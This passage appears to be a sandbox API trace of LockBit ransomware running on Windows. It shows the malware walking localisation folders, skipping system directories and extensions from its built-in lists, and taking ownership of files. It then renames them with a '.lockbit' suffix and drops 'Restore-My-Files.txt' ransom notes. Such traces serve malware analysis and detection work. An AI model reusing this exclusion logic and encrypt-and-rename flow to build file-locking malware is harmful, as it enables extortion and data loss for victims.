IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.310] NtClose (Handle=0x3c0) returned 0x0 [0077.311] RtlFreeAnsiString (AnsiString="\\") [0077.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0077.311] malloc (_Size=0x200) returned 0x53fcc0 [0077.311] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.311] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.311] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.311] CloseHandle (hObject=0x3c0) returned 1 [0077.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.312] free (_Block=0x53fcc0) [0077.312] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.lockbit")) returned 1 [0077.313] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0077.313] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.313] malloc (_Size=0x40068) returned 0x20ebb50 [0077.313] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20ebb68 | out: lpFileSize=0x20ebb68*=3584) returned 1 [0077.313] ReadFile (in: hFile=0x3c0, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 1 [0077.315] GetLastError () returned 0x3e5 [0077.315] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 1 [0077.315] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Restore-My-Files.txt") returned 78 [0077.315] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.316] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.316] malloc (_Size=0x40068) returned 0x3940048 [0077.317] WriteFile (in: hFile=0x3b4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0077.318] GetLastError () returned 0x3e5 [0077.318] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.318] GetLastError () returned 0x12 [0077.318] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.319] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="de-DE", cAlternateFileName="")) returned 1 [0077.319] lstrcmpiW (lpString1=".", lpString2="de-DE") returned -1 [0077.319] lstrcmpiW (lpString1="..", lpString2="de-DE") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="$windows.~bt") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="intel") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="msocache") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="$recycle.bin") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="$windows.~ws") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="tor browser") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="boot") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="system volume information") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="perflogs") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="google") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="application data") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="windows") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="windows.old") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="appdata") returned 1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="Windows nt") returned -1 [0077.319] lstrcmpiW (lpString1="de-DE", lpString2="Msbuild") returned -1 [0077.320] lstrcmpiW (lpString1="de-DE", lpString2="Microsoft") returned -1 [0077.320] lstrcmpiW (lpString1="de-DE", lpString2="All users") returned 1 [0077.320] lstrcmpiW (lpString1="de-DE", lpString2="mozilla") returned -1 [0077.320] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 57 [0077.320] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*") returned 59 [0077.320] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.321] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.321] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.321] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.321] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.321] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.321] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.321] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.321] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.321] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.321] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0077.321] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.321] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.321] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.321] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.321] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.322] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.322] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.322] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.322] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.322] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.322] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.323] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.323] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.324] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.324] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.324] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.324] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.324] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.324] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.324] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\") returned="" [0077.324] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned=".mui" [0077.324] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.324] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.324] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.324] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.325] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.325] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.325] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.325] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.325] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.lockbit") returned 81 [0077.325] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.325] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.lockbit")) returned 0 [0077.508] GetLastError () returned 0x5 [0077.509] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.509] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.509] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.509] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.509] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.509] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.510] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.510] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.521] NtClose (Handle=0x3b0) returned 0x0 [0077.521] RtlFreeAnsiString (AnsiString="\\") [0077.521] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0077.521] malloc (_Size=0x200) returned 0x53fcc0 [0077.521] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.521] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.521] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.521] CloseHandle (hObject=0x3b0) returned 1 [0077.521] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.522] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.522] free (_Block=0x53fcc0) [0077.522] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.522] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.lockbit")) returned 1 [0077.523] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0077.523] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.523] malloc (_Size=0x40068) returned 0x206b860 [0077.523] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4096) returned 1 [0077.523] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0077.525] GetLastError () returned 0x3e5 [0077.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 1 [0077.525] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Restore-My-Files.txt") returned 78 [0077.525] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0077.525] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.525] malloc (_Size=0x40068) returned 0x3940048 [0077.525] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0077.526] GetLastError () returned 0x3e5 [0077.527] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.527] GetLastError () returned 0x12 [0077.527] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.527] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="el-GR", cAlternateFileName="")) returned 1 [0077.527] lstrcmpiW (lpString1=".", lpString2="el-GR") returned -1 [0077.527] lstrcmpiW (lpString1="..", lpString2="el-GR") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="$windows.~bt") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="intel") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="msocache") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="$recycle.bin") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="$windows.~ws") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="tor browser") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="boot") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="system volume information") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="perflogs") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="google") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="application data") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="windows") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="windows.old") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="appdata") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="Windows nt") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="Msbuild") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="Microsoft") returned -1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="All users") returned 1 [0077.527] lstrcmpiW (lpString1="el-GR", lpString2="mozilla") returned -1 [0077.527] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 57 [0077.528] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*") returned 59 [0077.528] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.528] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.528] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.528] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.528] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.528] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.528] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.528] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.528] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.528] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".cmd", 